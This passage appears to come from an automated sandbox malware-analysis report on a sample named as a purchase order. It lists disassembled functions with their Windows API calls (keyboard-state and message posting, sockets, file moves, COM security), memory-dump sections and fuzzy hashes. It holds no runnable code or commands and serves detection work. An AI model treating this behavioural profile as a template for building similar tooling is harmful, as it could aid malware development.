                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          • Opcode ID: dbe8d967f683a9a59989c17fbe2e6c4263d6461b97ef2d5ab08ac6e0d1dd9f43
                          • Instruction ID: d4f153b3a7df9d27b654c6e72a732e3a1efb058d7b6d0cc272783df0c7271f83
                          • Opcode Fuzzy Hash: dbe8d967f683a9a59989c17fbe2e6c4263d6461b97ef2d5ab08ac6e0d1dd9f43
                          • Instruction Fuzzy Hash: 84D1DF71E0060AAFDF10EFA8C885BEEB7B5BF48754F148069E915AB280E770DD45DB90
                          Function 00F41522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                          Download Yara Rule
                          APIs
                          • GetCPInfo.KERNEL32(?,?), ref: 00F415CE
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F41651
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F416E4
                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00F416FB
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F41777
                          • __freea.LIBCMT ref: 00F417A2
                          • __freea.LIBCMT ref: 00F417AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                          • String ID:
                          • API String ID: 2829977744-0
                          • Opcode ID: 3d5af4992e744735f0920296e81af03305d9034254e2b4875c7cf22ae6875f30
                          • Instruction ID: 367c485d6cda0aeeda45ede02fb25935f141650ce668a6fd5abf733193033587
                          • Opcode Fuzzy Hash: 3d5af4992e744735f0920296e81af03305d9034254e2b4875c7cf22ae6875f30
                          • Instruction Fuzzy Hash: 1491A272E102169ADB248F64CC81AEE7FB5BF49760F184659EC05E7141EB35DCC4EBA0
                          Function 00F84523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearInit
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2610073882-625585964
                          • Opcode ID: cd777b8364d5275c5c4a554f7f4e7abc0f27ea2cd655719631d9fbce74e781f6
                          • Instruction ID: 3b3a37d83f26d48b96ba0d26ce474adccb6a459fcebe586fe3d44274e517e747
                          • Opcode Fuzzy Hash: cd777b8364d5275c5c4a554f7f4e7abc0f27ea2cd655719631d9fbce74e781f6
                          • Instruction Fuzzy Hash: 94917F71E0021AABDF20DFA5C845FEEBBB8EF45720F108559F505AB280D774A945DFA0
                          Function 00F71187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00F7125C
                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F71284
                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00F712A8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F712D8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F7135F
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F713C4
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F71430
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                          • String ID:
                          • API String ID: 2550207440-0
                          • Opcode ID: 9fb27e4a463972ee434c3ebb0326d35d336fb7c7d3126e2d9168847778c003b6
                          • Instruction ID: 1ef54351cd1c2e7df754e462b4cb6b633ad0b47c830d34ae29426657d9d88b99
                          • Opcode Fuzzy Hash: 9fb27e4a463972ee434c3ebb0326d35d336fb7c7d3126e2d9168847778c003b6
                          • Instruction Fuzzy Hash: 1F910771E002099FDB00DF9CD884BBE77B5FF45325F14802AE944E7292D778A949EB92
                          Function 00F1948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: 16a203455bc64af02e80ac4b2f938dff54687a40ef001ebca6e393d329ace161
                          • Instruction ID: f19e5eff9c41f294b319fa858a5a08d4e27b74883a490a19cbd2cca47edc0de9
                          • Opcode Fuzzy Hash: 16a203455bc64af02e80ac4b2f938dff54687a40ef001ebca6e393d329ace161
                          • Instruction Fuzzy Hash: D3913B71D04219EFCB11CFA9CC84AEEBBB9FF49320F148055E915B7251D378A981EBA0
                          Function 00F83947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00F8396B
                          • CharUpperBuffW.USER32(?,?), ref: 00F83A7A
                          • _wcslen.LIBCMT ref: 00F83A8A
                          • VariantClear.OLEAUT32(?), ref: 00F83C1F
                            • Part of subcall function 00F70CDF: VariantInit.OLEAUT32(00000000), ref: 00F70D1F
                            • Part of subcall function 00F70CDF: VariantCopy.OLEAUT32(?,?), ref: 00F70D28
                            • Part of subcall function 00F70CDF: VariantClear.OLEAUT32(?), ref: 00F70D34
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4137639002-1221869570
                          • Opcode ID: bd76a1082a9b920ee5849be41c338a05b9bc92e4afcdfa2fac0b3e78ac0a664d
                          • Instruction ID: 6f28d8abff01fc8429dab997a4863ebaba8e896bfd4d255ff74fd18c3b557041
                          • Opcode Fuzzy Hash: bd76a1082a9b920ee5849be41c338a05b9bc92e4afcdfa2fac0b3e78ac0a664d
                          • Instruction Fuzzy Hash: 2E918C75A083059FC704EF24C8819AAB7E5FF89714F14882DF88997361DB34EE45EB92
                          Function 00F84BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F6000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?,?,00F6035E), ref: 00F6002B
                            • Part of subcall function 00F6000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60046
                            • Part of subcall function 00F6000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60054
                            • Part of subcall function 00F6000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?), ref: 00F60064
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F84C51
                          • _wcslen.LIBCMT ref: 00F84D59
                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F84DCF
                          • CoTaskMemFree.OLE32(?), ref: 00F84DDA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 614568839-2785691316
                          • Opcode ID: afd2a978684f3c7a7f0ea982af24271323f27adea93fb3cf8c87786b188d45c1
                          • Instruction ID: 1c6be84d1c077e5e1558d6e1abe310db30a2bca7baad070202570e3503852fb2
                          • Opcode Fuzzy Hash: afd2a978684f3c7a7f0ea982af24271323f27adea93fb3cf8c87786b188d45c1
                          • Instruction Fuzzy Hash: 00911C71D0021EAFDF14EFA4DC91AEEB7B8BF04314F108169E515A7291EB746A44EFA0
                          Function 00F920FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenu.USER32(?), ref: 00F92183
                          • GetMenuItemCount.USER32(00000000), ref: 00F921B5
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F921DD
                          • _wcslen.LIBCMT ref: 00F92213
                          • GetMenuItemID.USER32(?,?), ref: 00F9224D
                          • GetSubMenu.USER32(?,?), ref: 00F9225B
                            • Part of subcall function 00F63A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63A57
                            • Part of subcall function 00F63A3D: GetCurrentThreadId.KERNEL32 ref: 00F63A5E
                            • Part of subcall function 00F63A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F625B3), ref: 00F63A65
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F922E3
                            • Part of subcall function 00F6E97B: Sleep.KERNEL32 ref: 00F6E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                          • String ID:
                          • API String ID: 4196846111-0
                          • Opcode ID: 799d59c4a125b9dc48e950f7e3c3875966a1bf3afbb7993f4955b48397d1bbf5
                          • Instruction ID: e67e212d70ad453394e9aea190dbe2fd24e78983273717d9a1a5ca5cdc531271
                          • Opcode Fuzzy Hash: 799d59c4a125b9dc48e950f7e3c3875966a1bf3afbb7993f4955b48397d1bbf5
                          • Instruction Fuzzy Hash: 09719176E00205AFEF50EF64C841AAEB7F5EF48320F148459E916EB351DB38ED41AB90
                          Function 00F97E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(01245578), ref: 00F97F37
                          • IsWindowEnabled.USER32(01245578), ref: 00F97F43
                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F9801E
                          • SendMessageW.USER32(01245578,000000B0,?,?), ref: 00F98051
                          • IsDlgButtonChecked.USER32(?,?), ref: 00F98089
                          • GetWindowLongW.USER32(01245578,000000EC), ref: 00F980AB
                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F980C3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                          • String ID:
                          • API String ID: 4072528602-0
                          • Opcode ID: d2267d8fc7ccb2fc68774b58ae334d3298035a822b0f262372a9999cc84e0db4
                          • Instruction ID: e373d851bb7eeb62ce42c1c4143499a5db50675edf49eab9781c77e8d3c87c89
                          • Opcode Fuzzy Hash: d2267d8fc7ccb2fc68774b58ae334d3298035a822b0f262372a9999cc84e0db4
                          • Instruction Fuzzy Hash: DA71A235908344AFFF21AF64CC94FAA7BB5FF0A364F14005AE95567261CB31A845EB90
                          Function 00F6AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 00F6AEF9
                          • GetKeyboardState.USER32(?), ref: 00F6AF0E
                          • SetKeyboardState.USER32(?), ref: 00F6AF6F
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F6AF9D
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6AFBC
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F6AFFD
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F6B020
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 8ba2b3b7c3358f49d122170e3f27383e3506252ac903085286bf8763b878edea
                          • Instruction ID: b212d4dd9fff05f021fd24cd0e8190a7dbf81467b9c73824bc8f78fc36bb36b8
                          • Opcode Fuzzy Hash: 8ba2b3b7c3358f49d122170e3f27383e3506252ac903085286bf8763b878edea
                          • Instruction Fuzzy Hash: 4651B2A1E047D53DFB3682348C45BBABEE95B06314F088589E1D9954C3D3E9A8C4EB52
                          Function 00F6ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(00000000), ref: 00F6AD19
                          • GetKeyboardState.USER32(?), ref: 00F6AD2E
                          • SetKeyboardState.USER32(?), ref: 00F6AD8F
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F6ADBB
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F6ADD8
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F6AE17
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F6AE38
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: b86678ca7e783934dee40728e103f239ffa8e507f150cbd1691f75cca074c31f
                          • Instruction ID: 4e4a03e390a058a5b3fca8203d93d1a891c69080052287e01d60df9644408968
                          • Opcode Fuzzy Hash: b86678ca7e783934dee40728e103f239ffa8e507f150cbd1691f75cca074c31f
                          • Instruction Fuzzy Hash: 2D5107A1E047D53DFB3383358C95B7A7EE85B06310F088489E1D5668C3D295EC94FB52
                          Function 00F3542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetConsoleCP.KERNEL32(00F43CD6,?,?,?,?,?,?,?,?,00F35BA3,?,?,00F43CD6,?,?), ref: 00F35470
                          • __fassign.LIBCMT ref: 00F354EB
                          • __fassign.LIBCMT ref: 00F35506
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F43CD6,00000005,00000000,00000000), ref: 00F3552C
                          • WriteFile.KERNEL32(?,00F43CD6,00000000,00F35BA3,00000000,?,?,?,?,?,?,?,?,?,00F35BA3,?), ref: 00F3554B
                          • WriteFile.KERNEL32(?,?,00000001,00F35BA3,00000000,?,?,?,?,?,?,?,?,?,00F35BA3,?), ref: 00F35584
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 285c908a9b2e9f4fabec6eff8bba4bda6df98b913ca0feae8a77cdcc6152339a
                          • Instruction ID: 2b9caba23166c491808bf5a5ad7ab7f991d06985bf75644ce0eb2511aee76596
                          • Opcode Fuzzy Hash: 285c908a9b2e9f4fabec6eff8bba4bda6df98b913ca0feae8a77cdcc6152339a
                          • Instruction Fuzzy Hash: D251D3B1D006089FDB10CFA8D841AEEBBF9EF48720F14451AF555E7291D730AA41DB60
                          Function 00F22D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 00F22D4B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00F22D53
                          • _ValidateLocalCookies.LIBCMT ref: 00F22DE1
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00F22E0C
                          • _ValidateLocalCookies.LIBCMT ref: 00F22E61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 3b3d6a7d160e677ae5b3ddad9fd134122c7283141bedc615b742c11b2dc48601
                          • Instruction ID: 4f8d393a2cbdd6356c790c2bcb078745fe0feb5f164cf0d81bf8e00aef3a3753
                          • Opcode Fuzzy Hash: 3b3d6a7d160e677ae5b3ddad9fd134122c7283141bedc615b742c11b2dc48601
                          • Instruction Fuzzy Hash: 45411475E00228BBCF10DF68EC45AAEBBB0BF45324F548155E814AB392D739DA01EBD0
                          Function 00F810B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F8304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F8307A
                            • Part of subcall function 00F8304E: _wcslen.LIBCMT ref: 00F8309B
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F81112
                          • WSAGetLastError.WSOCK32 ref: 00F81121
                          • WSAGetLastError.WSOCK32 ref: 00F811C9
                          • closesocket.WSOCK32(00000000), ref: 00F811F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 2675159561-0
                          • Opcode ID: 64d9b6151f048127e83b33761fc50f1eff3696e4d800f9433aa72703b35b5b9f
                          • Instruction ID: ce16519185136e9457c43f7202cc2fbf86003362f68f19a97f600460202e86ad
                          • Opcode Fuzzy Hash: 64d9b6151f048127e83b33761fc50f1eff3696e4d800f9433aa72703b35b5b9f
                          • Instruction Fuzzy Hash: 6D41D431600608AFDB10AF54CC88BEAB7EDFF45364F148259F9159B291C774AD42EBE1
                          Function 00F6CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6CF22,?), ref: 00F6DDFD
                            • Part of subcall function 00F6DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6CF22,?), ref: 00F6DE16
                          • lstrcmpiW.KERNEL32(?,?), ref: 00F6CF45
                          • MoveFileW.KERNEL32(?,?), ref: 00F6CF7F
                          • _wcslen.LIBCMT ref: 00F6D005
                          • _wcslen.LIBCMT ref: 00F6D01B
                          • SHFileOperationW.SHELL32(?), ref: 00F6D061
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                          • String ID: \*.*
                          • API String ID: 3164238972-1173974218
                          • Opcode ID: 1a53bf85134a9a127106982c91e47f464e6f6c54f11f72596e2e72988d510f58
                          • Instruction ID: ea83efb18c1ceddcb1d5e664875e5bc585ba8095e00e73befe962423a715520c
                          • Opcode Fuzzy Hash: 1a53bf85134a9a127106982c91e47f464e6f6c54f11f72596e2e72988d510f58
                          • Instruction Fuzzy Hash: 8F414871D451199FDF12EFA4DD81AED77B9AF08380F1000E6E545E7142EA74A684EB50
                          Function 00F92DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
